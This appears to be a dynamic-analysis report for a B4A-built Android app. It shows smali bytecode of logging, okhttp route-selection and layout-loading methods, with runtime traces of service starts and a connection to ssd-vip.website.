                        Position Instruction Meta Information
                        0new-instance v0, Ljava/lang/StringBuilder;
                        2const-string v1, "~"
                        4invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        6invoke-virtual {v0, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8const-string p0, ":"
                        10invoke-virtual {v0, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        12invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        13move-result-object p0
                        14if-nez p1, :cond_17
                        16const-string p1, "(null string)"
                        17cond_17:
                        18invoke-virtual {p1}, Ljava/lang/String;->length()I
                        19move-result v0
                        20const/16 v1, 0xf3c
                        21if-ge v0, v1, :cond_49
                        22new-instance v0, Ljava/lang/StringBuilder;
                        24invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        26const-string v1, "\\n"
                        28invoke-virtual {p1, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
                        29move-result-object v1
                        30array-length v2, v1
                        31const/4 p1, 0x0
                        32goto_2c: if-lt p1, v2, :cond_33
                        34invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object p1
                        36goto/16 :goto_49
                        37cond_33: aget-object v3, v1, p1
                        39invoke-virtual {v3}, Ljava/lang/String;->length()I
                        40move-result v4
                        41if-lez v4, :cond_41
                        43invoke-virtual {v0, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46cond_41:
                        47const-string v3, "\n"
                        49invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50add-int/lit8 p1, p1, 0x1
                        51goto/16 :goto_2c
                        52cond_49:
                        53invoke-static {p1}, Lanywheresoftware/b4a/BA;->Log(Ljava/lang/String;)V
                        • Time: 685981
                          • p0: ~i:*** Service (starter) Create ***
                        • Time: 686122
                          • p0: ~i:** Service (starter) Start **
                        • Time: 688204
                          • p0: icon-small
                        • Time: 689606
                          • p0: ~i:** Service (firebasemessaging) Start **
                        • Time: 690693
                          • p0: ~i:** Activity (main) Create (first time) **
                        • Time: 693353
                          • p0: ~l16196611:create
                        • Time: 695432
                          • p0: ~i:** Activity (main) Resume **
                        • Time: 696026
                          • p0: ~i:*** Service (newmessage1) Create ***
                        • Time: 696060
                          • p0: ~i:** Service (newmessage1) Start **
                        • Time: 696103
                          • p0: ~i:** Receiver (firebasemessaging) OnReceive **
                        • Time: 696225
                          • p0: ~i:** Activity (main) Pause, UserClosed = false **
                        • Time: 696944
                          • p0: ~i:*** Receiver (httputils2service) Receive (first time) ***
                        • Time: 697917
                          • p0: ~i:*** Receiver (httputils2service) Receive ***
                        • Time: 702732
                          • p0: ~i:Service started in foreground mode.
                        • Time: 811949
                          • p0: ~i:** Receiver (starter) OnReceive **
                        • Time: 811958
                          • p0: ~e:The Starter service should never be started from a receiver.
                        • Time: 811994
                          • p0: ~i:** Receiver (newmessage1) OnReceive **
                        • Time: 812010
                          • p0: ~i:** Receiver (pnservices) OnReceive **
                        • Time: 812170
                          • p0: ~i:*** Service (pnservices) Create ***
                        • Time: 812189
                          • p0: ~i:** Service (pnservices) Start **
                        • 4 additional calls hidden ...
                        54return-void
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.net.Proxy.type
                        • java.net.Proxy$Type.DIRECT:Ljava/net/Proxy$Type
                        • java.net.Proxy.type
                        • java.net.Proxy$Type.SOCKS:Ljava/net/Proxy$Type
                        • java.net.Proxy.address
                        • java.net.InetSocketAddress.getPort
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Object.getClass
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.net.Proxy.type
                        • java.net.Proxy$Type.SOCKS:Ljava/net/Proxy$Type
                        • java.net.InetSocketAddress.createUnresolved
                        • java.util.Collection.add
                        • java.util.List.isEmpty
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.net.InetSocketAddress.<init>
                        • java.util.Collection.add
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.UnknownHostException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.SocketException.<init>
                        Strings
                        • Proxy.address() is not an InetSocketAddress:
                        • ssd-vip.website
                        • returned no addresses for
                        • No route to
                        • ; port is out of range
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        5new-instance v0, Ljava/util/ArrayList;
                        7invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        8check-cast v0, Ljava/util/List;
                        9iput-object v0, p0, Lokhttp3/internal/connection/RouteSelector;->inetSocketAddresses:Ljava/util/List;
                        11invoke-virtual {p1}, Ljava/net/Proxy;->type()Ljava/net/Proxy$Type;
                        12move-result-object v1
                        14sget-object v2, Ljava/net/Proxy$Type;->DIRECT:Ljava/net/Proxy$Type;
                        15if-eq v1, v2, :cond_50
                        17invoke-virtual {p1}, Ljava/net/Proxy;->type()Ljava/net/Proxy$Type;
                        18move-result-object v1
                        20sget-object v2, Ljava/net/Proxy$Type;->SOCKS:Ljava/net/Proxy$Type;
                        21if-ne v1, v2, :cond_1a
                        22goto/16 :goto_50
                        23cond_1a:
                        24invoke-virtual {p1}, Ljava/net/Proxy;->address()Ljava/net/SocketAddress;
                        25move-result-object v1
                        26instance-of v2, v1, Ljava/net/InetSocketAddress;
                        27if-eqz v2, :cond_2f
                        29sget-object v2, Lokhttp3/internal/connection/RouteSelector;->Companion:Lokhttp3/internal/connection/RouteSelector$Companion;
                        30check-cast v1, Ljava/net/InetSocketAddress;
                        32invoke-virtual {v2, v1}, Lokhttp3/internal/connection/RouteSelector$Companion;->getSocketHost(Ljava/net/InetSocketAddress;)Ljava/lang/String;
                        33move-result-object v2
                        35invoke-virtual {v1}, Ljava/net/InetSocketAddress;->getPort()I
                        36move-result v1
                        37goto/16 :goto_64
                        38cond_2f: new-instance p1, Ljava/lang/StringBuilder;
                        40invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        42const-string v0, "Proxy.address() is not an InetSocketAddress: "
                        44invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46invoke-virtual {v1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        47move-result-object v0
                        49invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        51invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        52move-result-object p1
                        53new-instance v0, Ljava/lang/IllegalArgumentException;
                        55invoke-virtual {p1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        56move-result-object p1
                        58invoke-direct {v0, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        59check-cast v0, Ljava/lang/Throwable;
                        60throw v0
                        61cond_50:
                        62iget-object v1, p0, Lokhttp3/internal/connection/RouteSelector;->address:Lokhttp3/Address;
                        64invoke-virtual {v1}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        65move-result-object v1
                        67invoke-virtual {v1}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        • Time: 697775
                          • This:
                            • https://ssd-vip.website/
                          • Return:
                            • ssd-vip.website
                        68move-result-object v2
                        70iget-object v1, p0, Lokhttp3/internal/connection/RouteSelector;->address:Lokhttp3/Address;
                        72invoke-virtual {v1}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        73move-result-object v1
                        75invoke-virtual {v1}, Lokhttp3/HttpUrl;->port()I
                        76move-result v1
                        77goto_64: const v3, 0xffff
                        78const/4 v4, 0x1
                        79if-gt v4, v1, :cond_db
                        80if-lt v3, v1, :cond_db
                        82invoke-virtual {p1}, Ljava/net/Proxy;->type()Ljava/net/Proxy$Type;
                        83move-result-object p1
                        85sget-object v3, Ljava/net/Proxy$Type;->SOCKS:Ljava/net/Proxy$Type;
                        86if-ne p1, v3, :cond_7e
                        87check-cast v0, Ljava/util/Collection;
                        89invoke-static {v2, v1}, Ljava/net/InetSocketAddress;->createUnresolved(Ljava/lang/String;I)Ljava/net/InetSocketAddress;
                        90move-result-object p1
                        92invoke-interface {v0, p1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        93goto/16 :goto_b8
                        94cond_7e:
                        95iget-object p1, p0, Lokhttp3/internal/connection/RouteSelector;->eventListener:Lokhttp3/EventListener;
                        97iget-object v3, p0, Lokhttp3/internal/connection/RouteSelector;->call:Lokhttp3/Call;
                        99invoke-virtual {p1, v3, v2}, Lokhttp3/EventListener;->dnsStart(Lokhttp3/Call;Ljava/lang/String;)V
                        101iget-object p1, p0, Lokhttp3/internal/connection/RouteSelector;->address:Lokhttp3/Address;
                        103invoke-virtual {p1}, Lokhttp3/Address;->dns()Lokhttp3/Dns;
                        104move-result-object p1
                        106invoke-interface {p1, v2}, Lokhttp3/Dns;->lookup(Ljava/lang/String;)Ljava/util/List;
                        107move-result-object p1
                        109invoke-interface {p1}, Ljava/util/List;->isEmpty()Z
                        110move-result v3
                        111if-nez v3, :cond_b9
                        113iget-object v3, p0, Lokhttp3/internal/connection/RouteSelector;->eventListener:Lokhttp3/EventListener;
                        115iget-object v4, p0, Lokhttp3/internal/connection/RouteSelector;->call:Lokhttp3/Call;
                        117invoke-virtual {v3, v4, v2, p1}, Lokhttp3/EventListener;->dnsEnd(Lokhttp3/Call;Ljava/lang/String;Ljava/util/List;)V
                        119invoke-interface {p1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        120move-result-object p1
                        121goto_a0:
                        122invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        123move-result v2
                        124if-eqz v2, :cond_b8
                        126invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        127move-result-object v2
                        128check-cast v2, Ljava/net/InetAddress;
                        129move-object v3, v0
                        130check-cast v3, Ljava/util/Collection;
                        131new-instance v4, Ljava/net/InetSocketAddress;
                        133invoke-direct {v4, v2, v1}, Ljava/net/InetSocketAddress;-><init>(Ljava/net/InetAddress;I)V
                        135invoke-interface {v3, v4}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        136goto/16 :goto_a0
                        137cond_b8: return-void
                        138cond_b9: new-instance p1, Ljava/net/UnknownHostException;
                        139new-instance v0, Ljava/lang/StringBuilder;
                        141invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        143iget-object v1, p0, Lokhttp3/internal/connection/RouteSelector;->address:Lokhttp3/Address;
                        145invoke-virtual {v1}, Lokhttp3/Address;->dns()Lokhttp3/Dns;
                        146move-result-object v1
                        148invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        150const-string v1, " returned no addresses for "
                        152invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        154invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        156invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        157move-result-object v0
                        159invoke-direct {p1, v0}, Ljava/net/UnknownHostException;-><init>(Ljava/lang/String;)V
                        160check-cast p1, Ljava/lang/Throwable;
                        161throw p1
                        162cond_db: new-instance p1, Ljava/net/SocketException;
                        163new-instance v0, Ljava/lang/StringBuilder;
                        165invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        167const-string v3, "No route to "
                        169invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        171invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        172const/16 v2, 0x3a
                        174invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        176invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        178const-string v1, "; port is out of range"
                        180invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        182invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        183move-result-object v0
                        185invoke-direct {p1, v0}, Ljava/net/SocketException;-><init>(Ljava/lang/String;)V
                        186check-cast p1, Ljava/lang/Throwable;
                        187goto/16 :goto_102
                        188goto_101: throw p1
                        189goto_102: goto/16 :goto_101
                        Cross References
                        APIs
                        • java.lang.String.toLowerCase
                        • java.lang.String.endsWith
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.HashMap.get
                        • java.lang.ref.WeakReference.get
                        • java.io.DataInputStream.<init>
                        • java.io.DataInputStream.skipBytes
                        • anywheresoftware.b4a.BALayout.setUserScale
                        • android.view.ViewGroup.getLayoutParams
                        • android.view.ViewGroup.getLayoutParams
                        • android.view.ViewGroup.getLayoutParams
                        • anywheresoftware.b4a.BALayout.getWidth
                        • anywheresoftware.b4a.BALayout.getHeight
                        • anywheresoftware.b4a.keywords.LayoutBuilder$LayoutHashMap.<init>
                        • java.lang.ref.WeakReference.<init>
                        • java.util.HashMap.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • java.io.DataInputStream.close
                        • anywheresoftware.b4a.BALayout.setUserScale
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.io.DataInputStream.skip
                        • java.lang.RuntimeException.<init>
                        Strings
                        • .bal
                        • AssetsDir
                        • variant
                        • SEND_VIEWS_AFTER_LAYOUT
                        • animationDuration
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/String;",
                        4"Lanywheresoftware/b4a/BA;",
                        5"Z",
                        6"Landroid/view/ViewGroup;",
                        7"Ljava/util/LinkedHashMap<",
                        8"Ljava/lang/String;",
                        9"Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;",
                        10">;)",
                        11"Lanywheresoftware/b4a/keywords/LayoutBuilder$LayoutValuesAndMap;"
                        12}
                        13.end annotation
                        14.annotation system Ldalvik/annotation/Throws;
                        15value = {
                        16Ljava/io/IOException;
                        17}
                        18.end annotation
                        19move-object/from16 v0, p1
                        21const-string v1, ".bal"
                        22const/4 v11, 0x0
                        23try_start_5: sput-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->tempBA:Lanywheresoftware/b4a/BA;
                        25sget-object v2, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        26move-object/from16 v3, p0
                        28invoke-virtual {v3, v2}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        29move-result-object v2
                        31invoke-virtual {v2, v1}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z
                        32move-result v3
                        33if-nez v3, :cond_27
                        34new-instance v3, Ljava/lang/StringBuilder;
                        36invoke-static {v2}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        37move-result-object v2
                        39invoke-direct {v3, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        41invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        43invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        44move-result-object v1
                        45move-object v12, v1
                        46goto/16 :goto_28
                        47cond_27: move-object v12, v2
                        48goto_28:
                        49sget-object v1, Lanywheresoftware/b4a/keywords/LayoutBuilder;->cachedLayouts:Ljava/util/HashMap;
                        51invoke-virtual {v1, v12}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        52move-result-object v1
                        53check-cast v1, Ljava/lang/ref/WeakReference;
                        54if-eqz v1, :cond_39
                        56invoke-virtual {v1}, Ljava/lang/ref/WeakReference;->get()Ljava/lang/Object;
                        57move-result-object v1
                        58check-cast v1, Lanywheresoftware/b4a/keywords/LayoutBuilder$MapAndCachedStrings;
                        59goto/16 :goto_3a
                        60cond_39: move-object v1, v11
                        61goto_3a:
                        62invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirAssets()Ljava/lang/String;
                        • Time: 690713
                          • Return:
                            • AssetsDir
                        63move-result-object v2
                        65invoke-static {v2, v12}, Lanywheresoftware/b4a/objects/streams/File;->OpenInput(Ljava/lang/String;Ljava/lang/String;)Lanywheresoftware/b4a/objects/streams/File$InputStreamWrapper;
                        66move-result-object v2
                        68invoke-virtual {v2}, Lanywheresoftware/b4a/objects/streams/File$InputStreamWrapper;->getObject()Ljava/lang/Object;
                        69move-result-object v2
                        70check-cast v2, Ljava/io/InputStream;
                        71new-instance v13, Ljava/io/DataInputStream;
                        73invoke-direct {v13, v2}, Ljava/io/DataInputStream;-><init>(Ljava/io/InputStream;)V
                        75invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readInt(Ljava/io/DataInputStream;)I
                        76move-result v2
                        78invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readInt(Ljava/io/DataInputStream;)I
                        79move-result v3
                        80goto_55: if-gtz v3, :cond_1ad
                        81const/4 v3, 0x3
                        82const/4 v14, 0x0
                        83if-lt v2, v3, :cond_85
                        84if-eqz v1, :cond_71
                        86iget-object v2, v1, Lanywheresoftware/b4a/keywords/LayoutBuilder$MapAndCachedStrings;->cachedStrings:[Ljava/lang/String;
                        88invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readInt(Ljava/io/DataInputStream;)I
                        89const/4 v3, 0x0
                        90goto_63: array-length v4, v2
                        91if-lt v3, v4, :cond_67
                        92goto/16 :goto_86
                        93cond_67:
                        94invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readInt(Ljava/io/DataInputStream;)I
                        95move-result v4
                        97invoke-virtual {v13, v4}, Ljava/io/DataInputStream;->skipBytes(I)I
                        98add-int/lit8 v3, v3, 0x1
                        99goto/16 :goto_63
                        100cond_71:
                        101invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readInt(Ljava/io/DataInputStream;)I
                        102move-result v2
                        103new-array v3, v2, [Ljava/lang/String;
                        104const/4 v4, 0x0
                        105goto_78: if-lt v4, v2, :cond_7c
                        106move-object v2, v3
                        107goto/16 :goto_86
                        108cond_7c:
                        109invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readString(Ljava/io/DataInputStream;)Ljava/lang/String;
                        110move-result-object v5
                        111aput-object v5, v3, v4
                        112add-int/lit8 v4, v4, 0x1
                        113goto/16 :goto_78
                        114cond_85: move-object v2, v11
                        115goto_86:
                        116invoke-static {v13}, Lanywheresoftware/b4a/ConnectorUtils;->readInt(Ljava/io/DataInputStream;)I
                        117move-result v3
                        118sput-object v11, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        120invoke-static/range {p1 .. p1}, Lanywheresoftware/b4a/keywords/Common;->GetDeviceLayoutValues(Lanywheresoftware/b4a/BA;)Lanywheresoftware/b4a/keywords/LayoutValues;
                        121move-result-object v4
                        122const v5, 0x7f7fffff # Float.MAX_VALUE
                        123const/4 v6, 0x0
                        124const/4 v7, 0x0
                        125goto_95: if-lt v6, v3, :cond_18b
                        127sget-object v3, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        128iget v3, v3, Lanywheresoftware/b4a/keywords/LayoutValues;->Scale:F
                        130invoke-static {v3}, Lanywheresoftware/b4a/BALayout;->setUserScale(F)V
                        131if-nez p2, :cond_b4
                        133invoke-virtual/range {p3 .. p3}, Landroid/view/ViewGroup;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        134move-result-object v3
                        135if-nez v3, :cond_a7
                        136goto/16 :goto_b4
                        137cond_a7:
                        138invoke-virtual/range {p3 .. p3}, Landroid/view/ViewGroup;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        139move-result-object v3
                        140iget v3, v3, Landroid/view/ViewGroup$LayoutParams;->width:I
                        142invoke-virtual/range {p3 .. p3}, Landroid/view/ViewGroup;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        143move-result-object v4
                        144iget v4, v4, Landroid/view/ViewGroup$LayoutParams;->height:I
                        145goto/16 :goto_c0
                        146cond_b4:
                        147iget-object v3, v0, Lanywheresoftware/b4a/BA;->vg:Lanywheresoftware/b4a/BALayout;
                        149invoke-virtual {v3}, Lanywheresoftware/b4a/BALayout;->getWidth()I
                        150move-result v3
                        152iget-object v4, v0, Lanywheresoftware/b4a/BA;->vg:Lanywheresoftware/b4a/BALayout;
                        154invoke-virtual {v4}, Lanywheresoftware/b4a/BALayout;->getHeight()I
                        155move-result v4
                        156goto_c0: move v15, v3
                        157move v10, v4
                        158if-nez p4, :cond_140
                        159new-instance v16, Lanywheresoftware/b4a/keywords/LayoutBuilder$LayoutHashMap;
                        161invoke-direct/range {v16 .. v16}, Lanywheresoftware/b4a/keywords/LayoutBuilder$LayoutHashMap;-><init>()V
                        162if-eqz v1, :cond_cf
                        164iget-object v1, v1, Lanywheresoftware/b4a/keywords/LayoutBuilder$MapAndCachedStrings;->map:Ljava/util/HashMap;
                        165goto_cd: move-object v9, v1
                        166goto/16 :goto_e3
                        167cond_cf:
                        168invoke-static {v13, v2}, Lanywheresoftware/b4a/ConnectorUtils;->readMap(Ljava/io/DataInputStream;[Ljava/lang/String;)Ljava/util/HashMap;
                        169move-result-object v1
                        171sget-object v3, Lanywheresoftware/b4a/keywords/LayoutBuilder;->cachedLayouts:Ljava/util/HashMap;
                        172new-instance v4, Ljava/lang/ref/WeakReference;
                        173new-instance v5, Lanywheresoftware/b4a/keywords/LayoutBuilder$MapAndCachedStrings;
                        175invoke-direct {v5, v1, v2}, Lanywheresoftware/b4a/keywords/LayoutBuilder$MapAndCachedStrings;-><init>(Ljava/util/HashMap;[Ljava/lang/String;)V
                        177invoke-direct {v4, v5}, Ljava/lang/ref/WeakReference;-><init>(Ljava/lang/Object;)V
                        179invoke-virtual {v3, v12, v4}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        180goto/16 :goto_cd
                        181goto_e3:
                        182iget-object v1, v0, Lanywheresoftware/b4a/BA;->eventsTarget:Ljava/lang/Object;
                        183if-nez v1, :cond_ea
                        185iget-object v1, v0, Lanywheresoftware/b4a/BA;->activity:Landroid/app/Activity;
                        186goto/16 :goto_ec
                        187cond_ea:
                        188iget-object v1, v0, Lanywheresoftware/b4a/BA;->eventsTarget:Ljava/lang/Object;
                        189goto_ec: move-object v3, v1
                        190new-instance v1, Ljava/lang/StringBuilder;
                        192const-string v2, "variant"
                        194invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        196invoke-virtual {v1, v7}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        198invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        199move-result-object v6
                        200const/4 v7, 0x1
                        201move-object v1, v9
                        202move-object/from16 v2, p1
                        203move-object/from16 v4, p3
                        204move/from16 v5, p2
                        205move-object/from16 v8, v16
                        206move-object/from16 v17, v9
                        207move v9, v15
                        208move/from16 p0, v10
                        210invoke-static/range {v1 .. v10}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->loadLayoutHelper(Ljava/util/HashMap;Lanywheresoftware/b4a/BA;Ljava/lang/Object;Landroid/view/ViewGroup;ZLjava/lang/String;ZLjava/util/HashMap;II)V
                        212invoke-static/range {p1 .. p1}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        213move-result v1
                        214if-eqz v1, :cond_12a
                        216sget-object v1, Lanywheresoftware/b4a/keywords/LayoutBuilder;->viewsToSendInShellMode:Ljava/util/HashMap;
                        217if-eqz v1, :cond_12a
                        218const/4 v2, 0x0
                        219const/4 v3, 0x1
                        221const-string v4, "SEND_VIEWS_AFTER_LAYOUT"
                        222const/4 v5, 0x1
                        223const/4 v1, 0x1
                        224new-array v6, v1, [Ljava/lang/Object;
                        226sget-object v1, Lanywheresoftware/b4a/keywords/LayoutBuilder;->viewsToSendInShellMode:Ljava/util/HashMap;
                        227aput-object v1, v6, v14
                        228move-object/from16 v1, p1
                        230invoke-virtual/range {v1 .. v6}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        231sput-object v11, Lanywheresoftware/b4a/keywords/LayoutBuilder;->viewsToSendInShellMode:Ljava/util/HashMap;
                        232cond_12a:
                        233const-string v1, "animationDuration"
                        235invoke-static {v14}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        236move-result-object v2
                        237move-object/from16 v3, v17
                        239invoke-static {v3, v1, v2}, Lanywheresoftware/b4a/BA;->gm(Ljava/util/Map;Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        240move-result-object v1
                        241check-cast v1, Ljava/lang/Integer;
                        243invoke-virtual {v1}, Ljava/lang/Integer;->intValue()I
                        244move-result v14
                        245move-object v9, v3
                        246move-object/from16 v10, v16
                        247goto/16 :goto_145
                        248cond_140: move/from16 p0, v10
                        249move-object/from16 v10, p4
                        250move-object v9, v11
                        251goto_145:
                        252invoke-virtual {v13}, Ljava/io/DataInputStream;->close()V
                        254sget-object v3, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        255sget v8, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        256move-object v1, v12
                        257move-object/from16 v2, p1
                        258move-object/from16 v4, p3
                        259move-object v5, v10
                        260move v6, v15
                        261move/from16 v7, p0
                        263invoke-static/range {v1 .. v9}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->runScripts(Ljava/lang/String;Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/keywords/LayoutValues;Landroid/view/View;Ljava/util/LinkedHashMap;IIFLjava/util/Map;)V
                        264const/high16 v0, 0x3f800000 # 1.0f
                        266invoke-static {v0}, Lanywheresoftware/b4a/BALayout;->setUserScale(F)V
                        268sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        269if-eqz v0, :cond_178
                        271sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        273invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        274move-result-object v0
                        275goto_167:
                        276invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        277move-result v1
                        278if-nez v1, :cond_16e
                        279goto/16 :goto_178
                        280cond_16e:
                        281invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        282move-result-object v1
                        283check-cast v1, Lanywheresoftware/b4a/objects/CustomViewWrapper;
                        285invoke-virtual {v1}, Lanywheresoftware/b4a/objects/CustomViewWrapper;->AfterDesignerScript()V
                        286goto/16 :goto_167
                        287cond_178: move/from16 v4, p0
                        288move-object/from16 v8, p3
                        290invoke-static {v10, v8, v15, v4, v14}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->animateLayout(Ljava/util/LinkedHashMap;Landroid/view/View;III)V
                        291new-instance v0, Lanywheresoftware/b4a/keywords/LayoutBuilder$LayoutValuesAndMap;
                        293sget-object v1, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        295invoke-direct {v0, v1, v10}, Lanywheresoftware/b4a/keywords/LayoutBuilder$LayoutValuesAndMap;-><init>(Lanywheresoftware/b4a/keywords/LayoutValues;Ljava/util/LinkedHashMap;)V
                        296try_end_186: sput-object v11, Lanywheresoftware/b4a/keywords/LayoutBuilder;->tempBA:Lanywheresoftware/b4a/BA;
                        297sput-object v11, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        298return-object v0
                        299cond_18b: move-object/from16 v8, p3
                        300try_start_18d:
                        301invoke-static {v13}, Lanywheresoftware/b4a/keywords/LayoutValues;->readFromStream(Ljava/io/DataInputStream;)Lanywheresoftware/b4a/keywords/LayoutValues;
                        302move-result-object v9
                        304sget-object v10, Lanywheresoftware/b4a/keywords/LayoutBuilder;->chosen:Lanywheresoftware/b4a/keywords/LayoutValues;
                        305if-nez v10, :cond_19d
